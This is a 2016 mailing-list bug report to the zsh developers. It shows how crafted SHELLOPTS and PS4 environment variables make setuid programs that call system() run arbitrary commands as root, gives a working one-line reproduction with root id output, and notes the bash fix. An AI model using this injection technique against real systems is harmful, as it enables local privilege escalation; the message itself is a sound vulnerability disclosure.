From mboxrd@z Thu Jan  1 00:00:00 1970
Return-Path: <zsh-workers-return-39456-mason-zsh=primenet.com.au@zsh.org>
Received: (qmail 6356 invoked by alias); 27 Sep 2016 07:31:21 -0000
Mailing-List: contact zsh-workers-help@zsh.org; run by ezmlm
Precedence: bulk
X-No-Archive: yes
List-Id: Zsh Workers List <zsh-workers.zsh.org>
List-Post: <mailto:zsh-workers@zsh.org>
List-Help: <mailto:zsh-workers-help@zsh.org>
X-Seq: 39456
Received: (qmail 28711 invoked from network); 27 Sep 2016 07:31:21 -0000
X-Qmail-Scanner-Diagnostics: from mail-lf0-f44.google.com by f.primenet.com.au (envelope-from <mlen@mlen.pl>, uid 7791) with qmail-scanner-2.11 
 (clamdscan: 0.99.2/21882. spamassassin: 3.4.1.  
 Clear:RC:0(209.85.215.44):SA:0(0.0/5.0):. 
 Processed in 0.471492 secs); 27 Sep 2016 07:31:21 -0000
X-Spam-Checker-Version: SpamAssassin 3.4.1 (2015-04-28) on f.primenet.com.au
X-Spam-Level: 
X-Spam-Status: No, score=0.0 required=5.0 tests=HTML_MESSAGE,SPF_PASS,
	T_DKIM_INVALID autolearn=unavailable autolearn_force=no version=3.4.1
X-Envelope-From: mlen@mlen.pl
X-Qmail-Scanner-Mime-Attachments: |
X-Qmail-Scanner-Zip-Files: |
Received-SPF: pass (ns1.primenet.com.au: SPF record at _netblocks.google.com designates 209.85.215.44 as permitted sender)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=mlen.pl; s=google;
        h=mime-version:from:date:message-id:subject:to;
        bh=sUHJdvY7KXnnlQtV0VXpcn+U6oErt/rjmmiykfU/icc=;
        b=WaBp/5p2QjxTaSnsvdfYn21GP8xg9FlRbbD1xVmT68uY9am6mxNH3v4FuFwtHkvehM
         26WcD3tFnoY3XwFATgxYXmi0B8ZChnaZu+9I4sTbSN8pSXApudmVp5KHqq02mYYt7OIy
         8Z7nat4AZ5lE0PhHbUQ1n0EzkiklKV3K0/vpE=
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=1e100.net; s=20130820;
        h=x-gm-message-state:mime-version:from:date:message-id:subject:to;
        bh=sUHJdvY7KXnnlQtV0VXpcn+U6oErt/rjmmiykfU/icc=;
        b=HTrlTyiAcsPi8Pz7NLpW5Lu6FZpkTgP0dqaf5EAp7mAp1wEKlfS6ro97U2hBQ4L7FC
         7PZ4VLRXPLCiS/EYMkt7ADK1Wa9sSqKTZhOeHYoRlBZLQu2r+FAgpOPvXQ5ARyqg5Wkd
         BpHYJ0ksKbsgd5ysTwO693bUH1tGNucjJBh8RY4vLepduNZK7zk4UEWFL+i+z0lzh4Ix
         OheeCeESuqVVknKlw9Z5e3h0M0WdMhhKw5yqiU6/lzRJBtQFcjH3YunNx4TvUgYpSsF+
         HZ+oqvjF0WDrAG+wCwXB3z5aJBnuiqhc9rpm4NrqHXhIr7SLferVpWZzgEaN5k76SU9X
         VL8Q==
X-Gm-Message-State: AE9vXwMqlZR7geH63JNT8jYz0mxlRP6DbIx1NJ6HUw1ksFMRgk5YHtilwsVxQKaLxuw9XYM7Na5klQva5KGtPA==
X-Received: by 10.25.150.208 with SMTP id y199mr9773146lfd.92.1474959569328;
 Mon, 26 Sep 2016 23:59:29 -0700 (PDT)
MIME-Version: 1.0
From: Mateusz Lenik <mlen@mlen.pl>
Date: Tue, 27 Sep 2016 06:59:18 +0000
Message-ID: <CALDAOts+rgsuZfABkgVBphvY4CLcUiMLFA4xR0bUXPNxnhcHug@mail.gmail.com>
Subject: BUG: crafting SHELLOPTS and PS4 allows to run arbitrary programs in
 setuid binaries using system
To: zsh-workers@zsh.org
Content-Type: multipart/alternative; boundary=001a114022ba302e0a053d77c9a4

--001a114022ba302e0a053d77c9a4
Content-Type: text/plain; charset=UTF-8

Hello everyone!

I just learned that bash fixed a vulnerability that also affects zsh. It
allowed to run arbitrary programs by crafting SHELLOPTS and PS4 variables
against setuid binaries using system/popen.

Steps to reproduce:
% gcc -xc - -otest <<< 'int main() { setuid(0); system("/bin/date"); }'
% sudo chown root:root test
% sudo chmod 4755 test
% env -i SHELLOPTS=xtrace PS4='$(id)' ./test
uid=0(root) gid=... groups=.../bin/date
Tue Sep 27 08:49:16 CEST 2016
% zsh --version

zsh 5.2 (x86_64-pc-linux-gnu)
%

The solution that bash folks implemented is to drop PS4 from env when the
shell is ran as root.

Best,
mlen

--001a114022ba302e0a053d77c9a4--